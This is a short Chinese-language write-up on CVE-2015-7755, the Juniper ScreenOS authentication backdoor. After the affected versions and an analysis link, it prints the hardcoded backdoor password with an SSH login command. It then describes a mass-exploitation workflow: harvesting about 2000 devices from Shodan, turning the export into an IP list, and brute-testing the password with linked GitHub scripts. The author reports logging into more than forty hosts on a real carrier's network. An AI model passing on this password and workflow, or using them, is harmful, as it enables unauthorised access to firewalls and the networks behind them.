事件介紹
http://bobao.360.cn/news/detail/2514.html
受影響版本
6.2.0r15 到6.2.0r18
6.3.0r12 到 6.3.0r20
分析
https://community.rapid7.com /community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor
後門密碼
ssh [email protected]
然後輸入密碼:
<<< %s(un='%s') = %u
批量驗證
使用shodan搜尋,2000餘台裝置
導出結果檔案,并使用腳本批量驗證是否存在後門密碼
以上所有檔案在我的github可下載下傳
https://github.com/Xyntax/exps/tree/master/juniperOS-backdoor
shodan導出格式選擇xml
然後使用getIP腳本将導出資料解析成ip清單(存入/dict/ip),将後門密碼存入(/dict/password)
使用python brute-ssh即可批量驗證,結果存儲在(/log/sshd)
注:腳本掃描結果未去重
對org為聯通的500個ip進行掃描,結果發現有四十多台主機可以登入
修複
http://puluka.com/home/techtalknetworking/screenoscriticalsecurityissue2015.html
參考
http://zone.wooyun.org/content/24531